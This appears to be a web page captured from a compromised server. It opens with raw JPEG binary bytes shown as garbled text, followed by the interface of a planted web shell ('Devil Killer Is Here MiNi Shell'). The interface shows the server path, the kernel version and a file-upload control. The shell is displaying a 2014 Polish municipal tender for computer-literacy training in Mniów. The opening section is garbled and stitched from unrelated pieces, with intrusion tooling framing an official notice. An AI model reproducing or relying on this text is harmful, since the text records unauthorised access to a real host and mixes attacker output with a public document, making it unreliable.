JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141024/354214-N-2014.html

<p class="kh_header"><b>Mniów: Przeprowadzenie szkoleń z zakresu obsługi komputera i korzystania z Internetu</b><br>
<b>Numer ogłoszenia: 354214 - 2014; data zamieszczenia: 24.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Mniowie , ul. Centralna 9, 26-080 Mniów, woj. świętokrzyskie, tel. +48 41 3737002, faks +48 41 3737004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń z zakresu obsługi komputera i korzystania z Internetu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.1	Przedmiotem zamówienia jest:
1)	Przeprowadzenie szkoleń 73 uczestników projektu (Beneficjentów Ostatecznych), z zakresu obsługi sprzętu komputerowego oraz aplikacji komputerowych i internetu, w wymiarze nie mniejszym niż 50 godzin lekcyjnych na osobę. 
Program szkolenia powinien obejmować co najmniej następujące zagadnienia podzielone odpowiednio na trzy moduły:
a.	Informacje podstawowe:
a)	zasady bezpiecznej i higienicznej pracy z komputerem,
b)	podstawowe informacje o komputerze: rodzaje, typy, budowa,
c)	podstawowe elementy zestawu komputerowego,
d)	uruchamianie i kończenie pracy z komputerem.
b.	System operacyjny:
a)	podstawowe elementy systemu operacyjnego,
b)	pliki i foldery,
c)	tworzenie i usuwanie, zapisywanie, zmiana nazwy, kopiowanie i przenoszenie plików i folderów.
c.	Praca z edytorem tekstu:

a)	zapoznanie się z klawiaturą komputera,
b)	tworzenie polskich znaków,
c)	formatowanie tekstu.
d.	Podstawy pracy z arkuszem kalkulacyjnym.
a)	budowa arkusza / skoroszytu,
b)	wprowadzanie danych,
c)	zastosowanie formuł.
e.	Podstawy korzystania z Internetu:
a)	pojęcie Internetu,
b)	rodzaje usług /czat, poczta e-mail, p2p, itp./,
c)	wyszukiwanie informacji na zadany temat,
d)	formularze elektroniczne.
f.	Zastosowanie i możliwości przeglądarek internetowych:
a)	omówienie i konfiguracja przeglądarki,
b)	zasady wprowadzania adresów stron internetowych,
c)	wyszukiwanie stron internetowych.
g.	Poczta elektroniczna - e-mail:
a)	pojęcie poczty elektronicznej,
b)	budowa adresu mailowego,
c)	tworzenie konta pocztowego na wybranym portalu internetowym,
d)	obsługa poczty: tworzenie, wysyłanie, odbieranie wiadomości e-mail,
e)	wysyłanie, odbieranie wiadomości z załącznikami,
f)	foldery na poczcie i zarządzanie pocztą.
h.	Bankowość Internetowa:
a)	pojęcie bankowości internetowej,
b)	jak aplikować o założenie konta,
c)	prezentacja multimedialna sposobu logowania i używanie standartowej strony internetowej konta.

Wykonawca opracuje szczegółowy program szkolenia, który musi uwzględniać podstawowy poziom nabywanej wiedzy z zakresy opisanego powyżej przez  uczestnika szkolenia.
W ciągu 7 dni roboczych od zawarcia umowy Wykonawca przedłoży do akceptacji Zamawiającego harmonogram zajęć uwzględniający miejsca i terminy szkolenia dla poszczególnych grup szkoleniowych.
Zamawiający przewidział podział 73 uczestników na 5 grup (np.: 4 grupy po 15 osób, 1 grupa 13 osób).
Rekrutację na szkolenia prowadzi Zamawiający.

2)	Opracowanie, wydruk podręczników / materiałów szkoleniowych, materiałów ćwiczeniowych, prezentacji multimedialnych, programu szkoleń uwzględniających zakres planowanych szkoleń w w/w grupach szkoleniowe oraz dostawę notatnika formatu A-5 i długopis / ołówka - po 1 kpl. dla każdego uczestnika szkolenia.
3)	Wynajem sal szkoleniowych wraz z niezbędnym wyposażeniem umożliwiającym przeprowadzenie szkolenia z zakresu obsługi komputera i korzystania z Internetu - w liczbie zapewniającej terminową realizację szkoleń i zlokalizowanych na terenie Gminy Mniów.
4)	Zapewnienie wyżywienia dla uczestników szkoleń w ramach którego:
a.	każdy uczestnik będzie miał zapewniona wodę, herbatę i kawę wraz z cukrem i śmietanką w ilości dostosowanej do czasu szkolenia w każdym dniu szkolenia,
b.	ciastka i herbatniki w ilości nie mniejszej niż 15 dkg na osobę na każdy dzień szkolenia,
c.	każdy uczestnik będzie miał zapewnioną drożdżówkę w każdym dniu szkolenia.
5)	Zapewnienie minimum 3 trenerów posiadających odpowiednie kwalifikacje, wiedzę i doświadczenie do prowadzenia szkoleń w danym zakresie.

III.2	Minimalne wymagania dotyczące szkoleń:
Obowiązkiem Wykonawcy będzie:
a)	Przeprowadzenie szkoleń z zakresu obsługi komputera dla 73 beneficjentów ostatecznych w 5 grupach o podstawowym stopniu zaawansowania, dostosowanym do indywidualnych potrzeb i możliwości Uczestników. Łączna liczba godzin szkoleniowych dla każdego uczestnika - 50 godzin. 
Wykonawca powinien opracować harmonogram szkolenia dla w/w grup uwzględniający dzienny czas trwania zajęć nie dłuższy niż 8 godziny dydaktycznych dla jednej grupy w każdej ze wskazanych lokalizacji w godzinach 9.00 -18.00.
Szkolenia mogą odbywać się we wszystkich dniach tygodnia, od poniedziałku do niedzieli w przedziale godzinowym wskazanym powyżej.
Godzina zegarowa szkolenia liczy 60 minut i obejmuje godzinę dydaktyczną liczącą 45 min oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.
Pełne przeszkolenie jednej grupy uczestników szkoleń określonych w lit. a) powinno być przeprowadzone w ciągu maksymalnie 10 spotkań szkoleniowych (np. 10 dni po 5 godzin). Pełne przeszkolenie uczestników szkoleń określonych w lit. b) powinno być przeprowadzone w ciągu maksymalnie 2 spotkań szkoleniowych (2 dni po 8 godzin). 
Podstawą rozliczenia będzie ilość faktycznie zrealizowanych godzin dydaktycznych wskazana w dzienniku szkoleniowym, prowadzonym dla każdego dnia i grupy odrębnie.
Szkolenia mogą odbywać się równocześnie dla różnych grup w tym samym terminie i godzinach we wskazanych lokalizacjach. W takim przypadku każda z grup musi być prowadzona przez innego trenera.
1)	Wykonawca zobowiązany jest do pokrycia ewentualnych kosztów dojazdu, zakwaterowania, wyżywienia trenerów w czasie szkoleń (koszty te są pokrywane samodzielnie przez podmiot realizujący szkolenie w ramach wynagrodzenia za przeprowadzenie zajęć).
2)	W przypadku zaistnienia wyjątkowych okoliczności uniemożliwiających przeprowadzenie danego szkolenia przez trenera wskazanego w ofercie, Wykonawca ma prawo do wskazania innego trenera, który to szkolenie poprowadzi, pod warunkiem, iż trener pełniący zastępstwo spełnia kryteria wskazane w niniejszym zamówieniu oraz Wykonawca uzyska aprobatę Zamawiającego na wprowadzenie zmiany.
3)	Opracowanie, przygotowanie i dostarczenie na miejsce szkolenia, dla każdego uczestnika materiałów szkoleniowych.
a)	Wykonawca zobowiązany jest do przygotowania scalonych (np. bindowanych) materiałów szkoleniowych w formie drukowanej dla wszystkich uczestników szkolenia + jeden komplet dodatkowo na potrzeby archiwalne projektu. Materiały powinny zawierać m.in.:
-	program szkolenia,
-	teoretyczne wprowadzenie w zagadnienia poszczególnych zakresów szkoleń,
-	kompletną treść prezentacji multimedialnej wykorzystywanej przez prowadzącego w trakcie szkolenia,
-	materiał ćwiczeniowo - warsztatowy realizowany przez uczestników szkolenia,
-	notatnik formatu A-5,
-	długopis lub ołówek,

b)	Jeden egzemplarz materiałów szkoleniowych w wersji elektronicznej (np. format - word, Excel, prezentacja multimedialna) przekazany zostanie na adres e-mail wskazany przez Zamawiającego lub na płycie CD - nie później niż na 10 dni przed terminem szkolenia, w celu akceptacji materiałów.
c)	Na materiałach szkoleniowych Wykonawca umieści nazwę 
i logo Zamawiającego, tytuł projektu oraz oznaczenia i opisy dotyczące współfinansowania z Europejskiego Funduszu Rozwoju Regionalnego zgodne z Wytycznymi w zakresie oznaczania projektów w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.

4)	Zapewni właściwe oznakowanie miejsca szkolenia - zgodnie 
z wymogami  promocji Projektu (materiały zapewnia Zamawiający; odbiór w siedzibie Zamawiającego).
5)	Wydanie każdemu uczestnikowi szkolenia, certyfikatu ukończenia szkolenia współfinansowanego ze środków  Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, który będzie zawierał między innymi informację o ilości godzin i zrealizowanym zakresie tematycznym oraz oznaczenia dotyczące współfinansowania Projektu.
Warunkiem wydania zaświadczenia jest udział uczestników szkoleń w co najmniej 80% godzin szkoleniowych określonych w programie szkolenia.
6)	Prowadzenie dokumentacji z przebiegu szkolenia tj. dzienników zajęć edukacyjnych zawierających listę obecności, wymiar godzin 
i tematy zajęć edukacyjnych.
7)	Umożliwienie Zamawiającemu oraz innym uprawnionym podmiotom przeprowadzenia kontroli prawidłowości realizacji usługi, w tym m.in. prowadzonej dokumentacji, instruktorów i osób szkolonych 
w dowolnym momencie realizacji usługi, zarówno w siedzibie Wykonawcy, jak i w miejscu realizacji usługi.
8)	Przeprowadzenie badań jakości szkolenia (badanie ankietowe po zakończeniu szkolenia prowadzone wśród uczestników dotyczące odczuć związanych z przeprowadzonym szkoleniem: ocena szkolenia ogółem, ocena trenera, ocena materiałów szkoleniowych, ocena dobrych i słabych stron szkolenia) oraz opracowanie w formie pisemnej i przekazanie wyników tych badań (ankiety) Zamawiającemu.
9)	Zgłaszanie Zamawiającemu w formie  pisemnej lub e-mailem w terminie 1 dnia od zaistnienia zdarzenia:
a)	wszelkich nieobecności uczestników na szkoleniu,
b)	przypadków rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania,
c)	wszelkich innych zmian dotyczących szkolenia np.: nie rozpoczęcia szkolenia, przerw w szkoleniu.
10)	Przygotowania pisemnego Protokołu z realizacji usługi szkoleniowej, nie później niż w terminie 14 dni po zakończeniu szkolenia, zawierającego podsumowanie całego szkolenia, do którego będą dołączone w szczególności:
a)	1 egzemplarz materiałów szkoleniowych,
b)	lista obecności zawierającą potwierdzenie odbioru materiałów szkoleniowych przez uczestników,
c)	karta ewidencji czasu pracy trenera/trenerów,
d)	dzienniki zajęć edukacyjnych zawierające wymiar godzin i tematy zajęć edukacyjnych,
e)	przeprowadzone badania ankietowe wraz z opracowaniem ich wyników,
f)	rejestr wydanych uczestnikom certyfikatów o ukończeniu szkolenia, w którym wzięli udział.
Wykonawca skonsultuje się z Zamawiającym w celu ustalenia wzoru certyfikatu i przedstawi go Zamawiającemu do akceptacji nie później niż na 5 dni przed terminem zakończenia szkolenia.
11)	Wyjaśnienia lub uzupełnienia Protokół, o którym mowa w pkt 11, w terminie 5 dni od daty otrzymania uwag od Zamawiającego.
III.3	Minimalne wymagania dotyczące sali szkoleniowej
Obowiązkiem Wykonawcy jest:
1)	Zapewnienie sali dydaktycznej.
Zapewnienia sali lub sal dydaktycznych z odpowiednim sprzętem niezbędnym do zrealizowania przedmiotowego zamówienia, przy czym zajęcia muszą odbywać się w pomieszczeniach, gdzie zapewnione są właściwe warunki BHP i p.poż. oraz zaplecze socjalne, w tym dostęp do WC zaopatrzonego w środki higieny.
Sale w przypadku zajęć teoretycznych powinny być wyposażone co najmniej w tablicę standardową lub tablicę flipchart, stanowiska komputerowe w minimalnej ilości odpowiadającej liczbie grupy szkoleniowej wraz z dostępem do Internetu oraz zainstalowanym systemem operacyjnym Windows 7, oprogramowaniem biurowym Open Office w wersji 4.2 składającym się z minimum edytora tekstu i arkusza kalkulacyjnego, przeglądarką internetową Mozilla Firefox, programem pocztowym Mozilla Thunderbird .
Sale powinny być zlokalizowane na terenie Gminy Mniów. Preferowane lokalizacje to następujące miejscowości gminy: Mniów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie: 1 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie treści złożonych oświadczeń: 
1)	oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust.1,
2)	oświadczenia o braku podstaw do wykluczenia wykonawcy na podstawie art.24 ust.1,
3)	oświadczenia o przynależności do grupy kapitałowej na podstawie art. 26 ust. 2d,
4)	treści złożonych dokumentów, których Zamawiający wymaga w celu potwierdzenia spełniania warunków udziału w postępowaniu, oraz dokumentów wymaganych w celu wykazania braku podstaw do wykluczenia z postępowania.

Zamawiający dokonując oceny spełniania warunków udziału w postępowaniu przez Wykonawcę będzie stosował formułę spełnia / nie spełnia.

Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa  w art. 22  ust. 1 wg załączonego wzoru (Załącznik  nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się:
1)	Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1, dotyczące:
b)	posiadania wiedzy i doświadczenia - Zamawiający wymaga legitymowania się doświadczeniem w zakresie szkolenia z obsługi komputerów minimum jednego szkolenia dla grupy o ilości min 70 uczestników i o wartości nie mniejszej niż 35 tys. zł. brutto; 
2)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. Wykonawca musi legitymować się wykonaniem co najmniej 1 usługi szkoleniowej, której tematyka jest zgodna 
z tematem szkolenia będącego przedmiotem zamówienia określonego w pkt. III.1 ppkt. 1, z podaniem ich wartości, nazwy przedmiotu zamówienia (szkolenia), nazwy odbiorcy zamówienia, terminu realizacji, a także załączeniem dokumentów potwierdzających, że szkolenia te zostały przeprowadzone należycie. Wykaz usług powinien być sporządzony wg wzoru załącznika nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się:
1)	Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1, dotyczące:
c)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Wykonawca musi wykazać się w tym zakresie, że dysponuje co najmniej 3 osobami (trenerami), posiadającymi odpowiednią wiedzę i kwalifikacje. Trenerzy przewidziani do realizacji szkoleń muszą posiadać wykształcenie: wyższe kierunkowe minimum licencjat oraz doświadczenie w realizacji minimum 1 szkoleń, których zakres jest zgodny ze szkoleniem będącym przedmiotem zamówienia określonym w pkt. III.1 ppkt. 1, i wykonanego w okresie 3 lat przed wszczęciem postępowania o udzielenie zamówienia - udokumentowane w przedstawionym przez Wykonawcę wykazie o posiadanym doświadczeniu w tym zakresie.

3)	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji  niezbędnych do  wykonania  zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami, na formularzu zgodnym z treścią załącznika nr 5 do SIWZ . Wykonawca zobowiązany jest przekazać Zamawiającemu najpóźniej w dniu podpisania umowy na realizację zamówienia, CV trenerów odpowiedzialnych za realizację zamówienia potwierdzające ich kompetencje i doświadczenie zawodowe.
W przypadku gdy Wykonawca nie dysponuje lecz będzie dysponował wskazanymi osobami, należy załączyć pisemne zobowiązanie odpowiednich podmiotów do ich udostępnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się:
1)	Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1, dotyczące:
sytuacji ekonomicznej i finansowej - Zamawiający wymaga aby wykonawca był ubezpieczony z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na wartość nie mniejszą niż 25 tys. zł za jedno lub wszystkie zdarzenia

4)	Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie   prowadzonej  działalności związanej z wykonaniem przedmiotu zamówienia - na sumę gwarancyjną nie mniejszą niż: 25 000,00 PLN  do  wykazania, że wykonawca spełnia  warunek  dotyczący znajdowania się w sytuacji finansowej i ekonomicznej pozwalającej na prawidłową realizację zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

